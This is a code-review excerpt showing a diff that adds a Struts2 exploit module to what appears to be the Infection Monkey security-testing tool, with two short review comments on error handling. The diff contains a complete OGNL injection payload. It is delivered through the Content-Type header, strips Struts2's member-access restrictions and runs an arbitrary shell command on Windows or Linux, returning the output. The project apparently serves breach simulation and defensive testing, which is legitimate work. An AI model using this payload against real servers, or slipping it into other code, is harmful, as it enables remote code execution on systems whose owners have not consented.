infection_monkey/exploit/struts2.py

```diff
@@ -0,0 +1,241 @@
+        if resp and ID_STRING in resp:
+            # Pulls architecture string
+            arch = re.search('(?<=Architecture:)\s+(\w+)', resp)
+            arch = arch.group(1)
+            return arch
+        else:
+            return False
+
+    @staticmethod
+    def get_redirected(url):
+        # Returns false if url is not right
+        headers = {'User-Agent': 'Mozilla/5.0'}
+        request = urllib2.Request(url, headers=headers)
+        try:
+            return urllib2.urlopen(request).geturl()
+        except urllib2.URLError:
+            LOG.error("Can't reach struts2 server")
+            return False
+
+    @staticmethod
+    def exploit(url, cmd, timeout=None):
+        """
+        :param url: Full url to send request to
+        :param cmd: Code to try and execute on host
+        :param timeout: How long to wait for response in seconds(if monkey is being executed
+        it's better not to wait it's whole output). By default we wait.
+        :return: response
+        """
+        page = ""
+
+        payload = "%{(#_='multipart/form-data')."
+        payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
+        payload += "(#_memberAccess?"
+        payload += "(#_memberAccess=#dm):"
+        payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
+        payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
+        payload += "(#ognlUtil.getExcludedPackageNames().clear())."
+        payload += "(#ognlUtil.getExcludedClasses().clear())."
+        payload += "(#context.setMemberAccess(#dm))))."
+        payload += "(#cmd='%s')." % cmd
+        payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
+        payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
+        payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
+        payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
+        payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
+        payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
+        payload += "(#ros.flush())}"
+        # Turns payload ascii just for consistency
+        if isinstance(payload, unicode):
+            payload = unicodedata.normalize('NFKD', payload).encode('ascii', 'ignore')
+        headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
+        try:
+            request = urllib2.Request(url, headers=headers)
+            # Timeout added or else we would wait for all monkeys' output
+            page = urllib2.urlopen(request, timeout=timeout).read()
+        except AttributeError:
+            # If url does not exist
+            return False
+        except httplib.IncompleteRead, e:
+            page = e.partial
+        except Exception:
+            LOG.info("Request timed out, because monkey is still running on remote host")
```

Comment:
Doesn't fit as an error message for generic function

Reply:
Couldn't find propper error handling for timeout. Any help?